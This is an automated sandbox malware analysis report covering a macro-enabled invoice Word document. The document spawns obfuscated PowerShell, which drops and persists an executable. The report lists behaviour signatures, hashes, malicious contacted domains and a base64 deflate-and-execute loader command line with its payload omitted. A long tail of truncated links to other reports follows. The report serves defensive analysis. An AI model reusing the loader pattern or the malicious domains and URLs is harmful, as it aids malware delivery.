ID: Cookbook: browseurl.jbs Time: 20:07:02 Date: 11/07/2018 Version:


Table of Contents

Analysis Report
Overview: Information; Detection; Confidence; Classification; Analysis Advice
Signature Overview: AV Detection; Software Vulnerabilities; Networking; Persistence and Installation Behavior; Data Obfuscation; Spreading; System Summary; HIPS / PFW / Operating System Protection Evasion; Anti Debugging; Malware Analysis System Evasion; Hooking and other Techniques for Hiding and Protection; Language, Device and Operating System Detection
Behavior Graph
Simulations: Behavior and APIs
Antivirus Detection: Initial Sample; Dropped Files; Unpacked PE Files; Domains; URLs
Yara Overview: Initial Sample; PCAP (Network Traffic); Dropped Files; Memory Dumps; Unpacked PEs
Joe Sandbox View / Context: IPs; Domains; ASN; Dropped Files
Screenshots
Startup
Created / dropped Files
Contacted Domains/Contacted IPs: Contacted Domains; Contacted URLs; Contacted IPs (Public)
Static File Info: No static file info
Network Behavior: Network Port Distribution; TCP Packets; UDP Packets; DNS Queries; DNS Answers; HTTP Request Dependency Graph; HTTP Packets
Code Manipulations
Statistics: Behavior
System Behavior:
  Analysis Process: iexplore.exe PID: 3684 Parent PID: 548 (File Activities; Registry Activities)
  Analysis Process: iexplore.exe PID: 3740 Parent PID: 3684 (File Activities; Registry Activities)
  Analysis Process: WINWORD.EXE PID: 2364 Parent PID: 3684 (File Activities: File Created, File Read; Registry Activities: Key Created)
  Analysis Process: powershell.exe PID: 2200 Parent PID: 2364 (File Activities: File Created, File Written, File Read; Registry Activities)
  Analysis Process: OSPPSVC.EXE PID: 2380 Parent PID: 424
  Analysis Process: 375.exe PID: 2868 Parent PID: 2200
  Analysis Process: 375.exe PID: 2852 Parent PID: 2868
  Analysis Process: montanacim.exe PID: 2500 Parent PID: 424
  Analysis Process: montanacim.exe PID: 2532 Parent PID: 2500
Disassembly

Copyright Joe Security LLC 2018

Analysis Report

Overview

Information

Joe Sandbox Version:
Analysis ID:
Start time: 20:07:02
Joe Sandbox Product: CloudBasic
Start date:
Overall analysis duration: 0h 2m 19s
Hypervisor based Inspection enabled:
Report type: light
Cookbook file name: browseurl.jbs
Sample URL:
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java )
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: EGA enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.evad.expl.win@15/14@2/3
Cookbook Comments:
  Adjust boot time
  Correcting counters for adjusted boot time
Warnings:
  Exclude process from analysis (whitelisted): WmiPrvSE.exe, conhost.exe, dllhost.exe
  Report size exceeded maximum capacity and may have missing behavior information.
  Report size getting too big, too many NtDeviceIoControlFile calls found.
  Report size getting too big, too many NtOpenKeyEx calls found.
  Report size getting too big, too many NtProtectVirtualMemory calls found.
  Report size getting too big, too many NtQueryAttributesFile calls found.
  Report size getting too big, too many NtQueryValueKey calls found.

Detection

[Table: Strategy, Score, Range, Reporting, Detection, Threshold]

Confidence

[Table: Strategy, Score, Range, Further Analysis Required?, Confidence]

Classification

[Figure: classification chart. Categories: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware. Scale: malicious, suspicious, clean]

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Signature Overview

AV Detection:
  Antivirus detection for dropped file
  Multi AV Scanner detection for dropped file

Software Vulnerabilities:
  Document exploit detected (process start blacklist hit)
  Potential browser exploit detected (process start blacklist hit)

Networking:
  HTTP GET or POST without a user agent
  Downloads files
  Downloads files from webservers via HTTP
  Performs DNS lookups
  Uses HTTPS

Persistence and Installation Behavior:
  Drops executables to the windows directory (C:\Windows) and starts them
  Drops PE files
  Drops PE files to the windows directory (C:\Windows)

Data Obfuscation:
  Binary contains a suspicious time stamp
  Document contains an embedded VBA with many randomly named variables
  Suspicious powershell command line found
  Binary may include packed or encrypted code

Spreading:
  Creates COM task schedule object (often to register a task for autostart)
  Enumerates the file system

System Summary:
  Document contains an embedded VBA macro which executes code when the document is opened / closed
  Document contains an embedded VBA macro which may execute processes
  Powershell connects to network
  Powershell drops PE file
  Creates mutexes
  Reads the hosts file
  PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
  Classification label
  Creates files inside the user directory
  Creates temporary files
  Parts of this applications are using the .net runtime (Probably coded in C#)
  Reads ini files
  Reads software policies
  Spawns processes
  Uses an in-process (OLE) Automation server
  Found GUI installer (many successful clicks)
  Found graphical window changes (likely an installer)
  Uses Microsoft Silverlight
  Checks if Microsoft Office is installed
  Uses new MSVCR Dlls
  Binary contains paths to debug symbols

HIPS / PFW / Operating System Protection Evasion:
  Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Anti Debugging:
  Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
  Checks if the current process is being debugged
  Enables debug privileges
  Creates guard pages, often used to prevent reverse engineering and debugging

Malware Analysis System Evasion:
  Checks the free space of harddrives
  Contains long sleeps (>= 3 min)
  Enumerates the file system
  May sleep (evasive loops) to hinder dynamic analysis
  Queries disk information (often used to detect virtual machines)
  Queries a list of all running processes

Hooking and other Techniques for Hiding and Protection:
  System process connects to network (likely due to code injection or exploit)
  Starts Microsoft Word (often done to prevent that the user detects that something wrong)
  Stores large binary data to the registry
  Disables application error messsages (SetErrorMode)

Language, Device and Operating System Detection:
  Queries the installation date of Windows
  Queries the volume information (name, serial number etc) of a device
  Queries the cryptographic machine GUID

Behavior Graph

[Figure: Behavior Graph. Startdate: 11/07/2018, Architecture: WINDOWS, Score: 100. Process nodes: iexplore.exe, WINWORD.EXE, powershell.exe, 375.exe, montanacim.exe, OSPPSVC.EXE]

Simulations

Behavior and APIs

Time      Type             Description
20:07:28  API Interceptor  354x Sleep call for process: iexplore.exe modified
20:07:42  API Interceptor  5x Sleep call for process: WINWORD.EXE modified
20:07:46  API Interceptor  3x Sleep call for process: OSPPSVC.EXE modified
20:07:46  API Interceptor  1x Sleep call for process: powershell.exe modified
20:07:51  API Interceptor  2x Sleep call for process: 375.exe modified
20:07:53  API Interceptor  2x Sleep call for process: montanacim.exe modified

Antivirus Detection

Initial Sample
  Detection: 6%, Scanner: virustotal

Dropped Files

  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_ [1].doc
    Detection: 100%, Scanner: Avira, Label: HEUR/Macro.Downloader.AMAK.Gen
  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_ doc.kusto82.partial
    Detection: 100%, Scanner: Avira, Label: HEUR/Macro.Downloader.AMAK.Gen
  C:\Users\user\AppData\Local\Temp\375.exe
    Detection: 24%, Scanner: virustotal

Unpacked PE Files
  No Antivirus matches

Domains
  shopsforclothes.uk  Detection: 0%, Scanner: virustotal
  gezginyerler.com  Detection: 0%, Scanner: virustotal
  Detection: 6%, Scanner: virustotal
  Detection: 4%, Scanner: virustotal

URLs
  Detection: 6%, Scanner: virustotal
  Detection: 6%, Scanner: virustotal

Yara Overview

Initial Sample: No yara matches
PCAP (Network Traffic): No yara matches
Dropped Files: No yara matches
Memory Dumps: No yara matches
Unpacked PEs: No yara matches

Joe Sandbox View / Context

IPs: No context
Domains: No context
ASN: No context
Dropped Files: No context

Screenshots

Startup

System is w7
iexplore.exe (PID: 3684 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: CA1F703CD665867E8132D2946FB55750)
  iexplore.exe (PID: 3740 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3684 CREDAT: /prefetch:2 MD5: CA1F703CD665867E8132D2946FB55750)
  WINWORD.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\content.ie5\e2pg59kz\factura-jul-734_ doc MD5: 5D798FF0BE2A8970D ACFD9D)
    powershell.exe (PID: 2200 cmdline: powershell. ( $verbosepreference.tostring()[1,3]+'x'-join'') (new-object SYStEM.IO.cOMprESsiOn.DEFLATesTreaM( [SySteM.i o.memorystream] [system.convert]::frombase64string( '[base64 string omitted]' ), [Io.comPrEssIoN.cOMpREsSIONmoDe]::DEcomPreSs ) foreach-object{new-object SysTEm.IO.StreamREAder( $_,[Text.enCoding]::aScIi ) } FOReACh-OBjEct{ $_.ReadToeND( ) } ) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      375.exe (PID: 2868 cmdline: 'C:\Users\SAMTAR~1\AppData\Local\Temp\375.exe' MD5: 5CFD7D5DDCE93878D78F788EE599CD4D)
        375.exe (PID: 2852 cmdline: C:\Users\SAMTAR~1\AppData\Local\Temp\375.exe MD5: 5CFD7D5DDCE93878D78F788EE599CD4D)
OSPPSVC.EXE (PID: 2380 cmdline: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE MD5: 358A9CCA612C68EB2F07DDAD4CE1D8D7)
montanacim.exe (PID: 2500 cmdline: C:\Windows\system32\montanacim.exe MD5: 5CFD7D5DDCE93878D78F788EE599CD4D)
  montanacim.exe (PID: 2532 cmdline: C:\Windows\system32\montanacim.exe MD5: 5CFD7D5DDCE93878D78F788EE599CD4D)
cleanup

Created / dropped Files

C:\Users\SAMTAR~1\AppData\Local\Temp\~DF39AECE6F2D8D91FE.TMP
  Process: C:\Program Files\Internet Explorer\iexplore.exe
  File Type: FoxPro FPT, blocks size 258, next free block index

C:\Users\SAMTAR~1\AppData\Local\Temp\~DFF15FB7F C0.TMP
  Process: C:\Program Files\Internet Explorer\iexplore.exe
  File Type: FoxPro FPT, blocks size 258, next free block index

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{453915F E8-B3E3-CCDA62336E41}.dat
  Process: C:\Program Files\Internet Explorer\iexplore.exe
  File Type: Microsoft Word Document

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{453915F E8-B3E3-CCDA62336E41}.dat
  Process: C:\Program Files\Internet Explorer\iexplore.exe
  File Type: Microsoft Word Document

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_ doc.kusto82.partial
  Process: C:\Program Files\Internet Explorer\iexplore.exe
  File Type: 77139Yc4581
  Malicious: true
  Antivirus: Avira, Detection: 100%

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_ doc.kusto82.partial:Zone.Identifier
  Process: C:\Program Files\Internet Explorer\iexplore.exe
  File Type: ASCII text, with CRLF line terminators
  Size (bytes): 26
  Malicious: true

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_ doc:Zone.Identifier
  Process: C:\Program Files\Internet Explorer\iexplore.exe
  File Type: very short file (no magic)
  Size (bytes): 1
  Entropy (8bit): 0.0

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_ [1].doc
  Process: C:\Program Files\Internet Explorer\iexplore.exe
  File Type: 77139Yc4581
  Malicious: true
  Antivirus: Avira, Detection: 100%

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{48A42F0F-085E-4C91-AAFF-15F0360F0BDE}.tmp
  Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  File Type: data
  Size (bytes): 1536

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C0B3E1FE-FA90-46FB-A94C-79F14B48BEF0}.tmp
  Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  File Type: FoxPro FPT, blocks size 0, next free block index , 1st used item "\375"
  Size (bytes): 1024

C:\Users\user\AppData\Local\Temp\375.exe
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: PE32 executable (GUI) Intel system file, for MS Windows
  Malicious: true
  Antivirus: virustotal, Detection: 24%

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  File Type: data
  Size (bytes): 162

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5V7KX1H03VFRMGGC1BGX.temp
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: data
  Size (bytes): 8016

\samr
  Process: C:\Program Files\Internet Explorer\iexplore.exe
  File Type: Hitachi SH big-endian COFF object, not stripped
  Size (bytes): 116

Contacted Domains/Contacted IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
shopsforclothes.uk true 0%, virustotal unknown
gezginyerler.com true true 0%, virustotal unknown
unknown unknown true 6%, virustotal unknown
unknown unknown true 4%, virustotal unknown

Contacted URLs

Name | Process
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Program Files\Internet Explorer\iexplore.exe

Contacted IPs

Public

IP | Country | Flag | ASN | ASN Name | Malicious
Turkey CIZGITR true
Mexico MegaCableSAdeCVMX
United States AS GO-DADDY-COM-LLC- GoDaddycomLLCUS

Static File Info

No static file info

Network Behavior

Network Port Distribution

Total Packets: (HTTPS) 80 (HTTP) 53 (DNS)


ID: Cookbook: browseurl.jbs Time: 00:12:30 Date: 24/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 00:12:30 Date: 24/03/2018 Version: ID: 51630 Cookbook: browseurl.jbs Time: 00:12:30 Date: 24/03/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Cookbook: browseurl.jbs Time: 12:58:02 Date: 02/04/2018 Version:

ID: Cookbook: browseurl.jbs Time: 12:58:02 Date: 02/04/2018 Version: ID: 5253 Cookbook: browseurl.jbs Time: 12:5:02 Date: 02/04/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 13:10:41 Date: 01/04/2018 Version:

ID: Cookbook: browseurl.jbs Time: 13:10:41 Date: 01/04/2018 Version: ID: 52775 Cookbook: browseurl.jbs Time: 13:10:41 Date: 01/04/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 16:58:45 Date: 04/06/2018 Version:

ID: Cookbook: browseurl.jbs Time: 16:58:45 Date: 04/06/2018 Version: ID: 62529 Cookbook: browseurl.jbs Time: 16:58:45 Date: 04/06/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Cookbook: browseurl.jbs Time: 10:12:02 Date: 15/01/2018 Version:

ID: Cookbook: browseurl.jbs Time: 10:12:02 Date: 15/01/2018 Version: ID: 42670 Cookbook: browseurl.jbs Time: 10:12:02 Date: 15/01/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 16:56:06 Date: 13/02/2018 Version:

ID: Cookbook: browseurl.jbs Time: 16:56:06 Date: 13/02/2018 Version: ID: 46296 Cookbook: browseurl.jbs Time: 16:56:06 Date: 13/02/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 15:46:38 Date: 29/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 15:46:38 Date: 29/03/2018 Version: ID: 52374 Cookbook: browseurl.jbs Time: 15:46:3 Date: 29/03/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 07:02:50 Date: 27/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 07:02:50 Date: 27/03/2018 Version: ID: 51900 Cookbook: browseurl.jbs Time: 07:02:50 Date: 27/03/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature Overview Networking:

More information

ID: Cookbook: browseurl.jbs Time: 17:39:02 Date: 22/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 17:39:02 Date: 22/03/2018 Version: ID: 5139 Cookbook: browseurl.jbs Time: 17:39:02 Date: 22/03/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

ID: Cookbook: browseurl.jbs Time: 11:59:06 Date: 14/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 11:59:06 Date: 14/05/2018 Version: ID: 5945 Cookbook: browseurl.jbs Time: 11:59:06 Date: 14/05/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

ID: Cookbook: browseurl.jbs Time: 20:27:59 Date: 16/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:27:59 Date: 16/03/2018 Version: ID: 50646 Cookbook: browseurl.jbs Time: 20:27:59 Date: 16/03/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

ID: Sample Name: 21PO jpg...js Cookbook: default.jbs Time: 14:32:06 Date: 21/11/2017 Version:

ID: Sample Name: 21PO jpg...js Cookbook: default.jbs Time: 14:32:06 Date: 21/11/2017 Version: ID: 371 Sample Name: 21PO201745.jpg...js Cookbook: default.jbs Time: 14:32:0 Date: 21/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence

ID: Cookbook: browseurl.jbs Time: 15:48:15 Date: 29/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 15:48:15 Date: 29/03/2018 Version: ID: 52376 Cookbook: browseurl.jbs Time: 15:4:15 Date: 29/03/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

ID: Cookbook: browseurl.jbs Time: 20:56:26 Date: 03/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:56:26 Date: 03/07/2018 Version: ID: 66665 Cookbook: browseurl.jbs Time: 20:56:26 Date: 03/07/2018 Version: 23.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

ID: Cookbook: browseurl.jbs Time: 14:46:55 Date: 31/08/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:46:55 Date: 31/08/2018 Version: ID: 74919 Cookbook: browseurl.jbs Time: 14:46:55 Date: 31/08/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report http://tiny.cc/34aqxy Overview General Information Detection Confidence

ID: Cookbook: browseurl.jbs Time: 13:46:19 Date: 09/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 13:46:19 Date: 09/05/2018 Version: ID: 5702 Cookbook: browseurl.jbs Time: 13:46:19 Date: 09/05/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

ID: Cookbook: browseurl.jbs Time: 22:12:09 Date: 17/11/2017 Version:

ID: Cookbook: browseurl.jbs Time: 22:12:09 Date: 17/11/2017 Version: ID: 37366 Cookbook: browseurl.jbs Time: 22:12:09 Date: 17/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

ID: Sample Name: FsQHOWXph8.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 20:31:13 Date: 16/03/2018 Version:

ID: Sample Name: FsQHOWXph8.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 20:31:13 Date: 16/03/2018 Version: ID: 50648 Sample Name: FsQHOWXph8.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 20:31: Date: 16/03/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection Confidence

ID: Cookbook: urldownload.jbs Time: 20:09:25 Date: 13/06/2018 Version:

ID: Cookbook: urldownload.jbs Time: 20:09:25 Date: 13/06/2018 Version: ID: 3923 Cookbook: urldownload.jbs Time: 20:09:25 Date: 13/0/201 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

ID: Sample Name: MobaXterm_installer.dat Cookbook: default.jbs Time: 18:29:43 Date: 25/05/2018 Version:

ID: Sample Name: MobaXterm_installer.dat Cookbook: default.jbs Time: 18:29:43 Date: 25/05/2018 Version: ID: 1259 Sample Name: MobaXterm_installer.dat Cookbook: default.jbs Time: 1:29:43 Date: 25/05/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection

ID: Cookbook: urldownload.jbs Time: 16:41:45 Date: 23/06/2018 Version:

ID: Cookbook: urldownload.jbs Time: 16:41:45 Date: 23/06/2018 Version: ID: 52 Cookbook: urldownload.jbs Time: 1:41:45 Date: 23/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

ID: Sample Name: js.jar Cookbook: defaultwindowsfilecookbook.jbs Time: 10:01:15 Date: 26/09/2018 Version:

ID: Sample Name: js.jar Cookbook: defaultwindowsfilecookbook.jbs Time: 10:01:15 Date: 26/09/2018 Version: ID: 80115 Sample Name: js.jar Cookbook: defaultwindowsfilecookbook.jbs Time: 10:01:15 Date: 26/09/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report js.jar Overview General Information

ID: Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version: ID: 64085 Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

ID: Sample Name: test.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 18:57:54 Date: 12/04/2018 Version:

ID: Sample Name: test.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 18:57:54 Date: 12/04/2018 Version: ID: 54427 Sample Name: test.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 18:57:54 Date: /04/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection Confidence Classification

ID: Cookbook: urldownload.jbs Time: 11:39:45 Date: 07/04/2018 Version:

ID: Cookbook: urldownload.jbs Time: 11:39:45 Date: 07/04/2018 Version: ID: 53619 Cookbook: urldownload.jbs Time: 11:39:45 Date: 07/04/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

ID: Cookbook: urldownload.jbs Time: 19:58:34 Date: 02/05/2018 Version:

ID: Cookbook: urldownload.jbs Time: 19:58:34 Date: 02/05/2018 Version: ID: 57706 Cookbook: urldownload.jbs Time: 19:5:34 Date: 02/05/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

ID: Sample Name: image002 Cookbook: default.jbs Time: 18:19:28 Date: 18/05/2018 Version:

ID: Sample Name: image002 Cookbook: default.jbs Time: 18:19:28 Date: 18/05/2018 Version: ID: 0309 Sample Name: image002 Cookbook: default.jbs Time: 1:19:2 Date: 1/05/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

ID: Cookbook: urldownload.jbs Time: 19:53:36 Date: 07/03/2018 Version:

ID: Cookbook: urldownload.jbs Time: 19:53:36 Date: 07/03/2018 Version: ID: 49 Cookbook: urldownload.jbs Time: 19:: Date: 0/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice

ID: Cookbook: browseurl.jbs Time: 14:54:22 Date: 05/09/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:54:22 Date: 05/09/2018 Version: ID: 75522 Cookbook: browseurl.jbs Time: 14:54:22 Date: 05/09/2018 Version: 23.0.0 Table of Contents Table of Contents 2 Analysis Report http://www.springdwnld2.com/download/? d=0&h=1&pnid=4&domain=hmapsanddrivingdirection.com&implementation_id=maps_spt_&source=g-ccc7-lp0-

ID: Cookbook: urldownload.jbs Time: 22:46:20 Date: 19/02/2018 Version:

ID: Cookbook: urldownload.jbs Time: 22:46:20 Date: 19/02/2018 Version: ID: 4706 Cookbook: urldownload.jbs Time: 22:46:20 Date: 1/02/201 Version: 21.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

ID: Cookbook: urldownload.jbs Time: 08:25:02 Date: 29/10/2018 Version: Fire Opal

ID: Cookbook: urldownload.jbs Time: 08:25:02 Date: 29/10/2018 Version: Fire Opal ID: Cookbook: urldownload.jbs Time: 0:25:02 Date: 29//201 Version: 24.0.0 Fire Opal Table of Contents Table of Contents Analysis Report http://15.1..14/neko.sh Overview General Information Detection Confidence

ID: Sample Name: Dxd1yOZMU1.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 09:43:59 Date: 21/10/2017 Version:

ID: Sample Name: Dxd1yOZMU1.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 09:43:59 Date: 21/10/2017 Version: ID: 34788 Sample Name: Dxd1yOZMU1.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 0:43:5 Date: 21/10/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information

ID: Sample Name: FD-1 Phase Out Notice.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:36:29 Date: 04/05/2018 Version: 22.0.

ID: Sample Name: FD-1 Phase Out Notice.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:36:29 Date: 04/05/2018 Version: 22.0. ID: 5762 Sample Name: FD-1 Phase Out Notice.doc Cookbook: defaultwindowsofficecookbook.jbs Time: :36:2 Date: 04/05/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection

ID: Cookbook: urldownload.jbs Time: 20:31:22 Date: 09/08/2018 Version:

ID: Cookbook: urldownload.jbs Time: 20:31:22 Date: 09/08/2018 Version: ID: 153 Cookbook: urldownload.jbs Time: 20:31:22 Date: 09/0/201 Version: 23.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

ID: Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: Fire Opal

ID: Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: Fire Opal ID: 82913 Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: 24.0.0 Fire Opal Table of Contents Table of Contents Analysis Report http://www.learningtoolkit.club Overview General Information

ID: Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version:

ID: Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version: ID: 54075 Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

ID: Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version: ID: 66523 Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

ID: Sample Name: maintools.js Cookbook: default.jbs Time: 15:43:35 Date: 17/02/2018 Version:

ID: Sample Name: maintools.js Cookbook: default.jbs Time: 15:43:35 Date: 17/02/2018 Version: ID: 48 Sample Name: maintools.js Cookbook: default.jbs Time: 1:43:3 Date: 1/02/2018 Version: 21.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

ID: Cookbook: browseurl.jbs Time: 15:47:47 Date: 11/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 15:47:47 Date: 11/05/2018 Version: ID: 59136 Cookbook: browseurl.jbs Time: 15:47:47 Date: 11/05/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

ID: Sample Name: test.txt Cookbook: default.jbs Time: 13:18:36 Date: 31/03/2018 Version:

ID: Sample Name: test.txt Cookbook: default.jbs Time: 13:18:36 Date: 31/03/2018 Version: ID: 5250 Sample Name: test.txt Cookbook: default.jbs Time: 13:18:3 Date: 31/03/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

ID: Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version: ID: 80599 Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report http://www.qbproadvisorshelp.com Overview General Information Detection

ID: Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version: ID: 70096 Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version: 23.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

ID: Sample Name: tesseract-ocrsetup exe. Cookbook: default.jbs Time: 16:44:15 Date: 12/02/2018 Version:

ID: Sample Name: tesseract-ocrsetup exe. Cookbook: default.jbs Time: 16:44:15 Date: 12/02/2018 Version: ID: 46161 Sample Name: tesseract-ocrsetup-3.05.01.exe Cookbook: default.jbs Time: 16:44:15 Date: 12/02/2018 Version: 20.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence

ID: Cookbook: urldownload.jbs Time: 18:48:38 Date: 19/06/2018 Version:

